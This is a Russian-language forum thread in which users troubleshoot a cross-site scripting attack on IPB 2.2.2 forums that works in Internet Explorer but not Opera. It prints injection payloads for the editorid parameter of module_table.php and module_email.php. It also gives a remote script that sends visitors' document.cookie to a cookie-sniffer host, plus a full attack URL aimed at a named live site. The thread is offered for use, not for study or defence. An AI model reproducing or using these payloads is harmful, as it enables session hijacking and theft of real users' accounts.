Xss в Ipb 2.2.2
 

под Ie Xss пашед....НО под оперой нет,чо делать??!!
ктнить подскажет?

xss приведи с конкретным примером

//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
отправляет куки. не пашет. сниффер s.netsec.ru.

//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/al.js></SCRIPT>
просто выводит алерт.пашет.

исходник cc.js
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;

конкретный пример это значит ссылка уязвимая сформированная тобой

/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
----------------------------------------------------
module_table.php?editorid= - уязвимый скрипт.

//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
вызывает скрипт сс.js каторый вызывает
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
и все ето хрень корректно работает под ие,но не пашет под оперой.
хотя алерт оперра выводит.

Я тебя прошу дать ссылку чтобы я зашел по ней и посмотрел какой формируется код страницы ёмоё

в опере символы урлкодируются

щас.

http://ufagames.ru/forums//jscripts/folder_rte_files/module_email.php?editorid=//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>

зашел в опере...кинуло на сниф,убери в совем скрипте передаресацию и просто сделай алерт(document.cookie)

проверь есть ли куки..

есть. alert(document.cookie); работает норм.

в асю постучи так быстрее будет
4444107------------44